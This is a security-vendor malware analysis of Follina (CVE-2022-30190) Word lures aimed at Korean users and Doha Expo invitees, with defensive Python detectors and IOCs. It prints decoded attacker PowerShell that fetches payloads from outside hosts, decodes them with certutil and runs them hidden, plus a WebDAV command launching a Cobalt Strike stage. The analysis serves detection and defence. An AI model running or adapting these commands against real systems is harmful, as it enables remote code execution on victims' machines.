Follina Vulnerability (CVE-2022-30190) Attack Using ‘Antimicrobial Film Request’ File

On June 7th, the ASEC analysis team promptly posted a brief introduction to a zero-day vulnerability affecting Microsoft Office files (Follina). As a patch for the vulnerability has not been distributed yet, users are advised to take caution.

AhnLab has distributed detection rules for attack attempts exploiting the vulnerability, covering both file and behavior detection, and the vulnerability can be detected by various AhnLab products (V3, MDS, and EDR). While the team was monitoring such attack attempts, a distribution case targeting Korean users was found in the ASD (AhnLab Smart Defense) infrastructure on June 7th. The log below is from V3 Lite 4.0; the attack distributed a file named ‘Antimicrobial Film Request 1-1.docx’.

Figure 1. Vulnerability attack log collected by the ASD infrastructure

As the post mentioned above explains, the file uses msdt.exe to run a remote command that abuses the legitimate Windows programs PowerShell.exe and CertUtil.exe to download an encoded script and decode it. It then uses PowerShell.exe again to inject shellcode into the currently running explorer.exe, which performs the malicious behaviors. The following section gives a more detailed explanation.

Figure 2. Command for running msdt.exe when the file with the vulnerability is opened

Opening a Word file named ‘Antimicrobial Film Request 1-1.docx’ that exploits the CVE-2022-30190 vulnerability executes a remote command as shown above.

// Part of the decoded command from the figure above
$cmd="c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell iwr -outf %tmp%\api.txt http://micronannox[.]com//b.txt & certutil -decode %tmp%\api.txt %tmp%\apis.ps1";
Start-Sleep 3;
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser & powershell %tmp%\apis.ps1";

The following summarizes the execution flow of the code run through the vulnerability.

  1. PowerShell.exe (iwr) downloads hxxp://micronannox[.]com/b.txt and saves it as %tmp%\api.txt.
  2. api.txt is decoded into apis.ps1 with CertUtil.exe (certutil -decode).
  3. The decoded apis.ps1 is executed in a hidden window after the execution policy has been set to RemoteSigned so that the script is allowed to run.
  4. apis.ps1 injects shellcode into the currently running explorer.exe. The injected shellcode downloads additional encrypted data from hxxp://micronannox[.]com/imei.omg to the C:\Users\Public\no1.png path and decrypts it with XOR.
  5. The file that is ultimately decrypted is an executable that downloads additional backdoor files.

Figure 3. Part of the code for apis.ps1
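To show how the execution chain above can be turned into process-tree detection logic, here is an added example (not AhnLab's V3 or EDR rule set): it runs a few simple rules over constructed process-creation records that mirror the winword.exe -> msdt.exe -> cmd.exe -> powershell.exe / certutil.exe chain. The pipe-delimited log format, the rule names and the sample records are assumptions of this example; the msdt.exe parameter payload in the sample is a placeholder, and sdiagnhost.exe is included only so the rules demonstrate walking the full ancestry rather than matching a single parent.

```python
"""
Behavior-detection example over constructed process-creation records, modelled on
the chain described in the post (winword.exe -> msdt.exe -> cmd.exe ->
powershell.exe / certutil.exe). Added example, not AhnLab's detection logic; the
log format (pid|ppid|image|cmdline), rule names and sample records are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-cased file name only, e.g. "msdt.exe"
    cmdline: str


# Constructed sample telemetry. The msdt.exe line uses <PLACEHOLDER> for the
# ms-msdt parameter payload; the cmd/powershell/certutil lines mirror the decoded
# command shown in the post. Record 160 is a benign PowerShell launch for contrast.
SAMPLE_LOG = """\
100|50|winword.exe|"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" "C:\\Users\\user\\Downloads\\Antimicrobial Film Request 1-1.docx"
110|100|msdt.exe|C:\\Windows\\system32\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=<PLACEHOLDER>"
120|110|sdiagnhost.exe|C:\\Windows\\system32\\sdiagnhost.exe -Embedding
130|120|cmd.exe|c:\\windows\\system32\\cmd.exe /c powershell iwr -outf %tmp%\\api.txt http://micronannox[.]com//b.txt & certutil -decode %tmp%\\api.txt %tmp%\\apis.ps1
140|130|powershell.exe|powershell iwr -outf %tmp%\\api.txt http://micronannox[.]com//b.txt
150|130|certutil.exe|certutil -decode %tmp%\\api.txt %tmp%\\apis.ps1
160|50|powershell.exe|powershell -File C:\\scripts\\inventory.ps1
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "certutil.exe"}


def parse_log(text: str) -> Dict[int, ProcEvent]:
    """Parse pipe-delimited records into a pid -> event map."""
    events: Dict[int, ProcEvent] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, image, cmdline = line.split("|", 3)
        events[int(pid)] = ProcEvent(int(pid), int(ppid), image.lower(), cmdline)
    return events


def ancestors(ev: ProcEvent, events: Dict[int, ProcEvent]) -> Iterator[ProcEvent]:
    """Yield parent, grandparent, ... while the parent is present in the log (cycle-safe)."""
    seen = set()
    cur = ev
    while cur.ppid in events and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = events[cur.ppid]
        yield cur


def detect(events: Dict[int, ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) pairs for every record that matches a rule."""
    alerts: List[Tuple[int, str]] = []
    for ev in events.values():
        chain = list(ancestors(ev, events))
        parent = chain[0] if chain else None
        cl = ev.cmdline.lower()

        # Figure 5 in the post: an Office application launching msdt.exe.
        if ev.image == "msdt.exe" and parent is not None and parent.image in OFFICE_APPS:
            alerts.append((ev.pid, "office_spawns_msdt"))
        # msdt.exe invoked through the ms-msdt: URL protocol handler.
        if ev.image == "msdt.exe" and ("ms-msdt:" in cl or "it_rebrowseforfile" in cl):
            alerts.append((ev.pid, "msdt_url_protocol_invocation"))
        # Figure 6 in the post: shells / LOLBins anywhere beneath msdt.exe.
        if ev.image in SHELLS and any(a.image == "msdt.exe" for a in chain):
            alerts.append((ev.pid, "msdt_descendant_shell"))
        # Step 2 of the chain: certutil used as a decoder.
        if ev.image == "certutil.exe" and "-decode" in cl:
            alerts.append((ev.pid, "certutil_decode"))
        # Step 1 of the chain: PowerShell downloading with iwr / Invoke-WebRequest.
        if ev.image == "powershell.exe" and ("iwr" in cl.split() or "invoke-webrequest" in cl):
            alerts.append((ev.pid, "powershell_download"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(parse_log(SAMPLE_LOG)):
        print(pid, rule)
```

The ancestry walk is what makes the "descendant of msdt.exe" rule robust: the shell is not a direct child of msdt.exe in the sample, yet cmd.exe, powershell.exe and certutil.exe are all flagged, while the unrelated PowerShell launch (record 160) produces no alert.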

AhnLab products detect and block Word files exploiting this latest vulnerability, as the detection figures below show.

V3 Behavior Detection

Figure 4. AhnLab V3 detecting the abnormal execution of msdt.exe

AhnLab EDR Detection

Figure 5. Detecting the abnormal execution of winword.exe -> msdt.exe

Figure 6. Detecting the abnormal execution of a suspicious powershell.exe

The detection rule applied to files related to the vulnerability also logged a file targeting the 2023 Doha Expo (VIP Invitation to Doha Expo 2023.docx) on June 2nd, which is discussed below.

The file attempts to download data from an external URL referenced in its internal document.xml.rels. To trick users, it uses a download URL related to the expo.

  • hxxps://files.attend-doha-expo[.]com/inv.html

Figures 7 and 8 show how the Word file is disguised as an invitation to the Doha Expo.

Figure 7. Word file attempting to connect to the external URL upon being run

Figure 8. Word file

The analysis team discovered two Word files while monitoring detection logs. The URL in the external relationship tag of document.xml.rels is the same in both files, but the placement of the tag differs slightly.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
(..omitted..)
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://files.attend-doha-expo[.]com/inv.html!" TargetMode="External" />
(..omitted..)
</Relationships>
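A static check for the relationship shown above, as an added example rather than ASEC's own tooling: it builds a minimal constructed .docx in memory whose word/_rels/document.xml.rels carries an external oleObject relationship, then lists every relationship in any .rels part that has TargetMode="External" and a remote target, recording the oleObject type and the trailing "!" seen in the sample. The host name in the sample is a placeholder, not the post's IOC.

```python
"""
Static check for Follina-style external relationships inside a .docx.
Added example (not ASEC's code): builds a minimal constructed .docx in memory,
then scans every *.rels part for TargetMode="External" relationships that point
at a remote scheme, the trait the post describes in document.xml.rels.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
REMOTE_SCHEMES = ("http://", "https://", "ms-msdt:")


def external_ole_targets(docx_bytes: bytes) -> List[Dict[str, object]]:
    """Return one finding per external relationship with a remote target.

    Each finding notes whether the relationship type is oleObject and whether
    the target ends in '!', the two traits seen in the samples, so a caller can
    rank them above ordinary external hyperlinks.
    """
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") != "External":
                    continue
                if not target.lower().startswith(REMOTE_SCHEMES):
                    continue
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "target": target,
                    "ole_object": rel.get("Type") == OLE_TYPE,
                    "bang_suffix": target.endswith("!"),
                })
    return findings


def build_sample_docx(target: str) -> bytes:
    """Constructed minimal docx containing only the parts the check needs."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId6" Type="{OLE_TYPE}" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host; the post's real IOC is files.attend-doha-expo[.]com.
    sample = build_sample_docx("https://example.invalid/inv.html!")
    for finding in external_ole_targets(sample):
        print(finding)
```

To use it on real files, pass the file bytes to external_ole_targets(). Legitimate documents routinely carry external hyperlinks, so the oleObject type and the "!" suffix are the stronger signals; treat TargetMode="External" alone as context rather than a verdict.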

The HTML file has a long comment (AAA…) in its upper part, just like the previously published PoC code, while its lower part contains Base64-encoded PowerShell code. The figure below shows the decoded code.

The previous blog post mentioned that various attacks are possible because attackers can execute any code they intend to run. In the HTML related to the Word file disguised as the ‘2023 Doha Expo Invitation,’ there is code that can download a Cobalt Strike payload.

Figure 9. HTML file (inv.html) downloaded from an external URL
$cmd="C:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224[.]233\webdav\ /user:user `$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete ";

Until an official patch is released, a temporary measure is to disable the MSDT URL protocol.

AhnLab can detect the vulnerable file and its behaviors with the following aliases:

  • [File Alias]
    Exploit/HTML.CVE-2022-30190.S1841
    Exploit/XML.CVE-2022-30190.S1842
    Exploit/DOC.CVE-2022-30190
    Downloader/DOC.External
  • [Behavior Alias]
    Behavior/MDP.Event.M4313

[IOC]
hxxps://files.attend-doha-expo[.]com/inv.html
hxxp://micronannox[.]com/b.txt
hxxp://micronannox[.]com/imei.omg
hxxp://micronannox[.]com/slid.html
85829b792aa3a5768de66beacdb0a0ce
7c4ee39de1b67937a26c9bc1a7e5128b
4e7fc2acd66d87c7a439b49196899001
35a20a3ace9f59456a75f469186d2d19
963cc5bd71dc0412941bfc336100ec94
hxxp://5.206.224[.]233
hxxp://23.106.122[.]13

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
